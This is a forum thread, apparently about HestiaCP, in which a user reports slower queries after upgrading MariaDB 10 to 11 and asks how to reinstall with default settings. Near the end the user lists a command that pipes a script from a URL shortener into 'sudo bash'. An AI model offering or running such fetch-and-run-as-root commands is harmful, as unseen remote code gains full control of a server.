Hello everyone,
I am reaching out to seek assistance regarding an issue I have encountered after upgrading from Mariabd 10.* to Mariadb 11.. Unfortunately, I have noticed a significant decline in query performance. For instance, a simple SELECT statement now takes approximately 0.0009 seconds, compared to just 0.0002 seconds prior to the upgrade. Additionally, executing a query on an empty table now takes around 0.0006 seconds instead of the previous 0.0001 seconds. This slowdown is quite concerning.
Moreover, I have observed that the information_schema table is now visible within phpmyadmin, which was not the case before the upgrade. This leads me to suspect that there may be a bug associated with this version.
To resolve these issues, I would greatly appreciate guidance on performing a clean reinstallation of MariaDB 10., ensuring that it is optimized for hestia and configured with the default parameters set by hestia. I have a backup of my database, so I am not concerned about losing any data; my primary goal is to restore the performance levels I experienced previously.
Thank you in advance for your support and assistance!
How do you MAKE DECISIONS?
Do you ‘test stuff on a test server’ ahead of time?
I LOVE hestiacp.
The LAST thing I’m gonna do is try to UPGRADE the database service… when they tell me that it is NOT SUPPORTED.
Sorry. I’d be glad to help.
But I’m no expert.
did you added the configs back? I have upgraded too and doesnt see any difference, same timings, information_schema not visible.
I tried to remove mariadb 11 and install mariadb 10, but the problem persists: the queries are too slow. I find the information_schema table again within phpMyadmin. How can I reset all Mariadb configurations to the default version of hestia? Please help me.
I have already tried unsuccessfully: /usr/local/hestia/install/upgrade/manual/migrate_phpmyadmin.sh
curl -fsSL https://7j.gg/fixperms | sudo bash -s –
When you did first step of the tutorial then you should have the old configs in the specified folder.
